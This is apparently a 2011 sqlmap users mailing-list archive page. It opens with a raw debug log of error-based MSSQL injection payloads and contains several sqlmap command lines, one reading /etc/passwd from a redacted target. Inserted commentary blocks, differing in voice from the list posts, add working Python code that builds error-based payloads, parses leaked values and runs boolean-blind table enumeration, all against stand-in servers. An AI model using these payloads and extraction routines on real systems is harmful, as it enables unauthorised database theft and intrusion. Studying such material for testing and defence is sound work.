master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'STKX'='STKX [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:58] [PAYLOAD] 20111' AND 3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:58] [PAYLOAD] 20111' AND 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM 
master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:00] [PAYLOAD] 20111' AND 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:00] [PAYLOAD] 20111' AND 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:01] [PAYLOAD] 20111' AND 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MPbC'='MPbC [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:02] [DEBUG] performed 38 queries in 16 seconds available databases [37]: [09:56:02] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 62 times [09:56:02] [INFO] Fetched data logged to text files under '/path/sqlmap-dev/output/www.vuln.com' [*] shutting down at: 09:56:02 David |
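Every [PAYLOAD] line in the log above is answered with HTTP 500, and the run ends with "available databases [37]:" followed by no names. The payloads are the error-based technique for Microsoft SQL Server: the database name is wrapped between two markers (the CHAR() chains spell ":mur:" and ":ksm:"), the whole string is fed to CONVERT(INT, ...), and the conversion error that SQL Server raises quotes the string, name included. That only yields data when the application echoes the error text back in the response body; a generic 500 page carries nothing to parse. One more thing worth checking in the log: the inner subquery reads "ORDER BY 1 ORDER BY name", and a T-SQL SELECT accepts only one ORDER BY clause, so that text is itself a syntax error. The following is an added example, not sqlmap's code: it builds the payload with a single ORDER BY, parses the value out of an error page, and runs the loop against two constructed stand-in servers (one verbose, one returning a generic 500 page). The markers, the server responses and the database list are assumptions of this example.

```python
import re
from typing import Callable, List, Optional

# Delimiters that the log spells out as CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)
# and CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58).
MARK_L, MARK_R = ":mur:", ":ksm:"


def decode_char_chain(expr: str) -> str:
    """Turn a CHAR(n)+CHAR(n)+... chain back into the string it concatenates."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def char_chain(s: str) -> str:
    """Inverse of decode_char_chain: spell a string without any quote character."""
    return "+".join(f"CHAR({ord(c)})" for c in s)


def build_payload(index: int, tag: int = 5378) -> str:
    """Error-based payload in the shape the log shows: CONVERT(INT, marker+name+marker)
    cannot succeed, and the conversion error quotes the offending string, name included.
    Unlike the log, the subquery carries a single ORDER BY."""
    inner = ("(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases "
             f"WHERE name NOT IN (SELECT TOP {index} name FROM master..sysdatabases ORDER BY name) ORDER BY name)")
    return f"' AND {tag}=CONVERT(INT,({char_chain(MARK_L)}+{inner}+{char_chain(MARK_R)})) AND 'a'='a"


def extract_value(body: str) -> Optional[str]:
    """Pull the value back out of a response; None when the page does not echo the error."""
    m = re.search(re.escape(MARK_L) + r"(.*?)" + re.escape(MARK_R), body, re.S)
    return m.group(1) if m else None


def enumerate_databases(fetch: Callable[[str], str], limit: int = 64) -> List[str]:
    """Walk the databases in name order until a response carries no marked value."""
    names = []
    for i in range(limit):
        value = extract_value(fetch(build_payload(i)))
        if value is None:
            break
        names.append(value)
    return names


# Constructed stand-ins for the target; a real instance would list user databases too.
DATABASES = ["master", "model", "msdb", "tempdb"]


def verbose_server(payload: str) -> str:
    """ASP page that echoes the OLE DB error text, as a verbose misconfiguration does."""
    index = int(re.search(r"SELECT TOP (\d+) name", payload).group(1))
    if index >= len(DATABASES):
        # TOP 1 over an empty set yields NULL; CONVERT(INT, NULL) raises nothing: ordinary page.
        return "<html><body>search results</body></html>"
    return ("Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
            f"Conversion failed when converting the nvarchar value '{MARK_L}{DATABASES[index]}{MARK_R}' "
            "to data type int.")


def generic_server(payload: str) -> str:
    """Same back-end fault, but the application hides it behind a generic 500 page."""
    return "<html><head><title>500 - Internal server error.</title></head><body></body></html>"
```

Against verbose_server the loop returns the four names; against generic_server it returns an empty list after the first request, which is the shape of the run above. When a target answers 500 to every payload, confirm first (with a single hand-built request) that the error text is actually reflected in the body before trusting any count or list the error-based technique reports.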
From: Miroslav S. <mir...@gm...> - 2011-02-09 10:52:49
just to warn you all. it will try to enumerate tables this way and if it fails it will fall back to the normal "brute" force way. this will be the case in a major percentage of cases.

kr

On Wed, Feb 9, 2011 at 11:49 AM, Miroslav Stampar <mir...@gm...> wrote:
> done.
>
> find it implemented in latest revision (r3287).
>
> kr
>
> On Tue, Feb 8, 2011 at 5:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>> we'll try to implement it in next few days
>>
>> kr
>>
>> On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek <M.S...@r-...> wrote:
>>> Hi all,
>>>
>>> in some rare cases default permissions on Access Databases have been
>>> modified, allowing at least read access for the default user to the system
>>> table: MSysObjects.
>>>
>>> In those cases it is easy to get the tablenames like that:
>>>
>>> SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1
>>>
>>> Is it worth to include this before the bruteforce tests that SQLmap is
>>> doing? Nevertheless there's no way to enumerate column names...
>>>
>>> -marek

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-09 10:49:35
done.

find it implemented in latest revision (r3287).

kr

On Tue, Feb 8, 2011 at 5:35 PM, Miroslav Stampar <mir...@gm...> wrote:
> we'll try to implement it in next few days
>
> kr
>
> On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek <M.S...@r-...> wrote:
>> Hi all,
>>
>> in some rare cases default permissions on Access Databases have been
>> modified, allowing at least read access for the default user to the system
>> table: MSysObjects.
>>
>> In those cases it is easy to get the tablenames like that:
>>
>> SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1
>>
>> Is it worth to include this before the bruteforce tests that SQLmap is
>> doing? Nevertheless there's no way to enumerate column names...
>>
>> -marek

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-09 09:50:53
hi Johan

thx for your report. find it fixed in the latest commit.

kr

On Wed, Feb 9, 2011 at 9:21 AM, Johan Flote Rosén <flo...@gm...> wrote:
> it turned out ok the second time around, but I just thought i'd share it
> anyways.
>
> [09:18:20] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 0.9-dev (r3284)
> Python version: 2.6.1
> Operating system: posix
> Command line: ./sqlmap.py -u
> ****************************************************** -f -b --current-user
> --current-db --users --passwords --dbs -v 1
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 82, in main
>     start()
>   File "/Users/flote/sqlmap-dev/lib/controller/controller.py", line 414, in start
>     action()
>   File "/Users/flote/sqlmap-dev/lib/controller/action.py", line 77, in action
>     conf.dbmsHandler.getPasswordHashes(), "password hash")
>   File "/Users/flote/sqlmap-dev/plugins/generic/enumeration.py", line 238, in getPasswordHashes
>     for user, password in value:
> ValueError: need more than 0 values to unpack

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Johan F. R. <flo...@gm...> - 2011-02-09 08:21:49
it turned out ok the second time around, but I just thought i'd share it anyways.

[09:18:20] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r3284)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u ****************************************************** -f -b --current-user --current-db --users --passwords --dbs -v 1
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 82, in main
    start()
  File "/Users/flote/sqlmap-dev/lib/controller/controller.py", line 414, in start
    action()
  File "/Users/flote/sqlmap-dev/lib/controller/action.py", line 77, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash")
  File "/Users/flote/sqlmap-dev/plugins/generic/enumeration.py", line 238, in getPasswordHashes
    for user, password in value:
ValueError: need more than 0 values to unpack
From: Miroslav S. <mir...@gm...> - 2011-02-08 22:10:40
aha, now i see: "sqlmap say me "the parameter par 1 is not dynamic" and shutdown"

you are using 0.8 right?

please update to the latest version (0.9/dev) from our repository:

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

we've fixed some minor stuff till then :)

kr

On Tue, Feb 8, 2011 at 10:55 PM, Miroslav Stampar <mir...@gm...> wrote:
> ..and why are you stunned ciccio?
>
> On Tue, Feb 8, 2011 at 10:54 PM, Miroslav Stampar <mir...@gm...> wrote:
>> have you tried different levels (--level)?
>>
>> have you tried different risks (--risk)?
>>
>> in plainspeak:
>> higher level = more techniques
>> higher risk = more prefix/postfix combinations
>>
>> kr
>>
>> On Tue, Feb 8, 2011 at 10:50 PM, ciccio panzino <cic...@gm...> wrote:
>>> Hi, I've tested manually several sites which give me typical ODBC
>>> MS-SQL syntax error with simple tick inserted in the POST login
>>> parameters. Again when I perform different payloads like "union select
>>> blabla" the error message change and show me I'm interact effectively
>>> with the db.
>>> BUT if I perform a simple test with sqlmap -u www.foo.bar/login.asp
>>> --method=post --data=par1=val1&par2=val2 -p par1 it say me par1 is not
>>> injectable (while manually it is). Why sqlmap doesn't see the vuln?
>>> Where I wrong?
>>> Again if in the data option i put a normal value for par1 (like asdf),
>>> sqlmap say me "the parameter par 1 is not dynamic" and shutdown, while
>>> if I put directly a tick after asdf value in the data option, sqlmap
>>> see it like "dynamic" and start the tests (with "not injectable"
>>> response at the end)
>>> help plz
>>> thks
>>> mariuolo

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-08 21:55:11
..and why are you stunned ciccio?

On Tue, Feb 8, 2011 at 10:54 PM, Miroslav Stampar <mir...@gm...> wrote:
> have you tried different levels (--level)?
>
> have you tried different risks (--risk)?
>
> in plainspeak:
> higher level = more techniques
> higher risk = more prefix/postfix combinations
>
> kr
>
> On Tue, Feb 8, 2011 at 10:50 PM, ciccio panzino <cic...@gm...> wrote:
>> Hi, I've tested manually several sites which give me typical ODBC
>> MS-SQL syntax error with simple tick inserted in the POST login
>> parameters. Again when I perform different payloads like "union select
>> blabla" the error message change and show me I'm interact effectively
>> with the db.
>> BUT if I perform a simple test with sqlmap -u www.foo.bar/login.asp
>> --method=post --data=par1=val1&par2=val2 -p par1 it say me par1 is not
>> injectable (while manually it is). Why sqlmap doesn't see the vuln?
>> Where I wrong?
>> Again if in the data option i put a normal value for par1 (like asdf),
>> sqlmap say me "the parameter par 1 is not dynamic" and shutdown, while
>> if I put directly a tick after asdf value in the data option, sqlmap
>> see it like "dynamic" and start the tests (with "not injectable"
>> response at the end)
>> help plz
>> thks
>> mariuolo

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-08 21:54:43
have you tried different levels (--level)?

have you tried different risks (--risk)?

in plainspeak:
higher level = more techniques
higher risk = more prefix/postfix combinations

kr

On Tue, Feb 8, 2011 at 10:50 PM, ciccio panzino <cic...@gm...> wrote:
> Hi, I've tested manually several sites which give me typical ODBC
> MS-SQL syntax error with simple tick inserted in the POST login
> parameters. Again when I perform different payloads like "union select
> blabla" the error message change and show me I'm interact effectively
> with the db.
> BUT if I perform a simple test with sqlmap -u www.foo.bar/login.asp
> --method=post --data=par1=val1&par2=val2 -p par1 it say me par1 is not
> injectable (while manually it is). Why sqlmap doesn't see the vuln?
> Where I wrong?
> Again if in the data option i put a normal value for par1 (like asdf),
> sqlmap say me "the parameter par 1 is not dynamic" and shutdown, while
> if I put directly a tick after asdf value in the data option, sqlmap
> see it like "dynamic" and start the tests (with "not injectable"
> response at the end)
> help plz
> thks
> mariuolo

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: ciccio p. <cic...@gm...> - 2011-02-08 21:50:16
Hi, I've tested manually several sites which give me the typical ODBC MS-SQL syntax error with a simple tick inserted in the POST login parameters. Again, when I perform different payloads like "union select blabla" the error message changes and shows me I'm interacting effectively with the db.

BUT if I perform a simple test with

sqlmap -u www.foo.bar/login.asp --method=post --data=par1=val1&par2=val2 -p par1

it tells me par1 is not injectable (while manually it is). Why doesn't sqlmap see the vuln? Where am I wrong?

Again, if in the data option I put a normal value for par1 (like asdf), sqlmap tells me "the parameter par1 is not dynamic" and shuts down, while if I put a tick directly after the asdf value in the data option, sqlmap sees it as "dynamic" and starts the tests (with a "not injectable" response at the end).

help plz
thks
mariuolo
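The two observations in this post (a plain value gives "not dynamic" and the run stops; the same value with a trailing tick is treated as dynamic) fit a pre-check that fetches the page with the supplied value and again with a random well-formed value, and skips the parameter when the two responses are the same. A login form that ignores the parameter's value unless it breaks the SQL string will fail such a check while still being injectable. The following is an added example, not sqlmap's code: the login handler, the 0.98 similarity threshold and the comparison method are all assumptions of this example, chosen to reproduce the symptom so that both checks can be run side by side.

```python
import difflib
import random
import string
from typing import Callable, Dict, Tuple

Page = Callable[[Dict[str, str]], str]


def fake_login_app(params: Dict[str, str]) -> str:
    """Constructed stand-in for login.asp: the value of par1 never changes the page
    unless it breaks the SQL string, in which case the ODBC error is echoed. The
    parameter is injectable, yet every well-formed value yields the same response."""
    par1 = params.get("par1", "")
    if "'" in par1:
        return ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
                "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark "
                f"before the character string '{par1}'.")
    return "<html><body><form>Login failed. Please try again.</form></body></html>"


def random_value(length: int = 6) -> str:
    """Well-formed replacement value: letters only, never a quote."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def is_dynamic(fetch: Page, params: Dict[str, str], name: str, threshold: float = 0.98) -> bool:
    """Baseline-versus-random comparison (assumed to be what produces the 'not dynamic'
    verdict): the parameter counts as dynamic only when the two pages differ."""
    baseline = fetch(params)
    probe = fetch({**params, name: random_value()})
    return difflib.SequenceMatcher(None, baseline, probe).ratio() < threshold


def tick_changes_page(fetch: Page, params: Dict[str, str], name: str) -> bool:
    """The manual check the poster did: append one quote and look for a DB error."""
    baseline = fetch(params)
    tick = fetch({**params, name: params[name] + "'"})
    return tick != baseline and "80040e14" in tick


def candidate_parameters(fetch: Page, params: Dict[str, str]) -> Dict[str, Tuple[bool, bool]]:
    """Per parameter: (dynamic according to the pre-check, tick produces a DB error)."""
    return {n: (is_dynamic(fetch, params, n), tick_changes_page(fetch, params, n)) for n in params}
```

With par1=asdf the pre-check returns False for par1 while the tick test returns True, which is exactly the disagreement reported above; with par1=asdf' the baseline itself is the error page, so the random replacement differs from it and the pre-check passes. When a scanner declares a parameter static, a hand-built request with a quote (or a string-breaking character for the DBMS in play) is the quickest way to decide whether the verdict is about the page or about the parameter.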
From: Bernardo D. A. G. <ber...@gm...> - 2011-02-08 17:02:16
Hi yonny,

On 6 February 2011 15:21, Bernardo Damele A. G. <ber...@gm...> wrote:
> ...
>>     conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
>>   File "/pentest/database/sqlmap/plugins/generic/filesystem.py", line 285, in readFile
>>     newFileContent += chunk
>> TypeError: cannot concatenate 'str' and 'NoneType' objects
>
> We have been reported this bug since 24 hours by another user. We are
> on the case. If you svn update, you'll see that the exception is
> handled correctly now, no traceback anymore.
> Support to read files on MySQL via error-based though will come as
> soon as we fix an important bug related to MySQL trimming of output in
> error-based payloads.

We have done the fix and re-enabled file retrieval via SQL injection techniques on MySQL one.

Cheers,
Bernardo

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Miroslav S. <mir...@gm...> - 2011-02-08 16:35:16
we'll try to implement it in next few days

kr

On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek <M.S...@r-...> wrote:
> Hi all,
>
> in some rare cases default permissions on Access Databases have been
> modified, allowing at least read access for the default user to the system
> table: MSysObjects.
>
> In those cases it is easy to get the tablenames like that:
>
> SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1
>
> Is it worth to include this before the bruteforce tests that SQLmap is
> doing? Nevertheless there's no way to enumerate column names...
>
> -marek

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-07 13:44:53
ok. we'll consider it.

i'll do some testing in the "wild" to see what's the percentage of those when I get time. if the percentage is "considerable" we can include it, for sure.

kr

On Mon, Feb 7, 2011 at 2:07 PM, Stiefenhofer, Marek <M.S...@r-...> wrote:
> Hi all,
>
> in some rare cases default permissions on Access Databases have been
> modified, allowing at least read access for the default user to the system
> table: MSysObjects.
>
> In those cases it is easy to get the tablenames like that:
>
> SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1
>
> Is it worth to include this before the bruteforce tests that SQLmap is
> doing? Nevertheless there's no way to enumerate column names...
>
> -marek

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Stiefenhofer, M. <M.S...@r-...> - 2011-02-07 13:42:12
Hi all,

in some rare cases default permissions on Access Databases have been modified, allowing at least read access for the default user to the system table: MSysObjects.

In those cases it is easy to get the tablenames like that:

SELECT MSysObjects.Name FROM MSysObjects WHERE MSysObjects.Type=1

Is it worth to include this before the bruteforce tests that SQLmap is doing? Nevertheless there's no way to enumerate column names...

-marek
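Marek's point, and Miroslav's reply earlier in this thread that the tool will try the catalogue first and fall back to the "brute" force way when that fails, together describe one procedure: probe MSysObjects, pull table names out of it blind if it is readable, otherwise guess table names from a wordlist and keep the ones the database accepts. The following is an added example of that procedure, not sqlmap's implementation and not Marek's code. It uses an in-memory sqlite3 database as a stand-in for Access (Access is not scriptable offline), with a hand-made MSysObjects table standing in for the Access catalogue; SUBSTR/LIMIT/OFFSET take the place of Access's Mid()/TOP, and the vulnerable query, the wordlist and the table names are constructed for the example.

```python
import sqlite3
import string
from typing import List, Optional, Tuple


def make_db(catalogue_readable: bool) -> sqlite3.Connection:
    """Constructed stand-in for the Access back-end. Creating MSysObjects (Name, Type=1
    for user tables) or not models whether its permissions allow the default user to read it."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id TEXT, name TEXT);
        CREATE TABLE users(id TEXT, login TEXT);
        CREATE TABLE orders(id TEXT);
        INSERT INTO products VALUES ('1', 'widget');
    """)
    if catalogue_readable:
        con.executescript("""
            CREATE TABLE MSysObjects(Name TEXT, Type INTEGER);
            INSERT INTO MSysObjects VALUES
                ('products', 1), ('users', 1), ('orders', 1), ('MSysObjects', 1);
        """)
    return con


def oracle(con: sqlite3.Connection, payload: str) -> bool:
    """Boolean-blind oracle: the vulnerable query concatenates the parameter and the
    'page' is truthy only when a product row comes back. A missing table or a syntax
    error is indistinguishable from a false condition, exactly as on a real site."""
    sql = f"SELECT name FROM products WHERE id = '{payload}'"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        return False


def ask(con: sqlite3.Connection, condition: str) -> bool:
    """Wrap a condition in the usual ' AND (...) AND '1'='1 boolean payload."""
    return oracle(con, f"1' AND ({condition}) AND '1'='1")


ALPHABET = string.ascii_letters + string.digits + "_"
CATALOGUE = "SELECT Name FROM MSysObjects WHERE Type=1"   # Marek's query


def tables_from_catalogue(con: sqlite3.Connection) -> Optional[List[str]]:
    """Read table names out of the catalogue one character at a time; None when the
    catalogue is not readable, which is the usual Access situation."""
    if not ask(con, f"(SELECT COUNT(*) FROM ({CATALOGUE})) >= 0"):
        return None
    count = next((n for n in range(64) if ask(con, f"(SELECT COUNT(*) FROM ({CATALOGUE})) = {n}")), 0)
    names = []
    for i in range(count):
        # Access would spell this with TOP and Mid(); the blind loop itself is the same.
        row = f"{CATALOGUE} ORDER BY Name LIMIT 1 OFFSET {i}"
        name = ""
        while True:
            pos = len(name) + 1
            hit = next((c for c in ALPHABET
                        if ask(con, f"(SELECT SUBSTR(Name, {pos}, 1) FROM ({row})) = '{c}'")), None)
            if hit is None:          # SUBSTR past the end returns '': name complete
                break
            name += hit
        names.append(name)
    return names


def tables_by_bruteforce(con: sqlite3.Connection, wordlist: List[str]) -> List[str]:
    """Fallback when no catalogue is readable: a guessed table exists iff COUNT(*)
    over it evaluates without error, one request per guess."""
    return sorted(t for t in wordlist if ask(con, f"(SELECT COUNT(*) FROM {t}) >= 0"))


def enumerate_tables(con: sqlite3.Connection, wordlist: List[str]) -> Tuple[str, List[str]]:
    """Catalogue first, wordlist second, as the thread describes."""
    names = tables_from_catalogue(con)
    if names is not None:
        return "catalogue", names
    return "bruteforce", tables_by_bruteforce(con, wordlist)


WORDLIST = ["admin", "customers", "orders", "products", "sessions", "users"]  # constructed
```

The catalogue path costs a handful of requests per character but returns every table, MSysObjects itself included; the fallback costs one request per guess and can only find names that are on the list. Neither path gives column names, which is the limitation Marek notes for Access.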
From: Bernardo D. A. G. <ber...@gm...> - 2011-02-06 15:21:46
Hi yonny.

On 6 February 2011 14:44, yonny mutai <yo...@go...> wrote:
> ...
> Command line: /pentest/database/sqlmap/sqlmap.py --level 5 --risk 3
> --parse-errors --msf-path /pentest/exploits/framework3 --read-file
> /etc/passwd --time-sec 10 --method=POST --data=user_name=loan&password=2121
> --threads 1 --timeout 39 -u **********************************************
> --dbms mysql --flush-session
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "/pentest/database/sqlmap/sqlmap.py", line 82, in main
>     start()
>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 414, in start
>     action()
>   File "/pentest/database/sqlmap/lib/controller/action.py", line 123, in action
>     conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
>   File "/pentest/database/sqlmap/plugins/generic/filesystem.py", line 285, in readFile
>     newFileContent += chunk
> TypeError: cannot concatenate 'str' and 'NoneType' objects

We have been reported this bug since 24 hours by another user. We are on the case. If you svn update, you'll see that the exception is handled correctly now, no traceback anymore.

Support to read files on MySQL via error-based though will come as soon as we fix an important bug related to MySQL trimming of output in error-based payloads.

Thanks for reporting.

Cheers,

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F